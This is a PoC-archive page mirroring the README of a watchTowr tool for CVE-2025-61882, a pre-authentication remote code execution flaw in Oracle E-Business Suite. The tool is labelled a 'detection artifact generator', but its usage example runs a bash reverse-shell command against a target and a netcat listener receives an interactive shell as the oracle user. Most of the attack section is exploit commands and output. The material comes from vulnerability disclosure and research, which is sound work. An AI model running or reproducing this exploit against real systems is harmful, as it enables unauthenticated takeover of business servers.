Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2025-61882 PoC — Oracle E-Business Suite 安全漏洞

Source
https://github.com/watchtowrlabs/watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882
Associated Vulnerability
Title:Oracle E-Business Suite 安全漏洞 (CVE-2025-61882)
Description:Vulnerability in the Oracle Concurrent Processing product of Oracle E-Business Suite (component: BI Publisher Integration). Supported versions that are affected are 12.2.3-12.2.14. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Concurrent Processing. Successful attacks of this vulnerability can result in takeover of Oracle Concurrent Processing. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Readme

# watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882

<img width="1000" height="627" alt="image" src="https://github.com/user-attachments/assets/46794126-0c0a-4cb6-b601-d7cc9a09f3ff" />


Detection Artifact Generator for Oracle E-Business Suite CVE-2025-61882

See our [blog post](https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/) for technical details

# Detection in Action

```
python3 watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882.py --command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' --platform linux  --target http://192.168.1.22:8000 --lhost 192.168.1.10 --lport 80
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882.py

        (*) Oracle E-Business Suite Pre-Auth RCE Detection Artifact Generator

          - Sonny, Sina Kheirkhah (@SinSinology),  Jake Knott (@inkmoro) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-61882]

[*] Listening on 192.168.1.10:80 and serving payload...
[*] connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking smuggle stub...
192.168.1.22 - - [06/Oct/2025 20:49:59] "GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1" 200 -

```
Listener
```
ubuntu@watchTowr:~$ nc -lvvnp 4444
Listening on 0.0.0.0 4444
Connection received on 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba),54323(oper),54324(backupdba),54325(dgdba),54326(kmdba),54330(racdba)
[oracle@apps EBS_domain]$
```

# Description

This script attempts to detect if Oracle E-Business Suite is vulnerable to CVE-2025-61882

# Affected Versions

Oracle E-Business Suite, versions 12.2.3-12.2.14

For more information visit [Oracle Security Alert Advisory - CVE-2025-61882](https://www.oracle.com/security-alerts/alert-cve-2025-61882.html)

# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 

- https://labs.watchtowr.com/

- https://x.com/watchtowrcyber
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →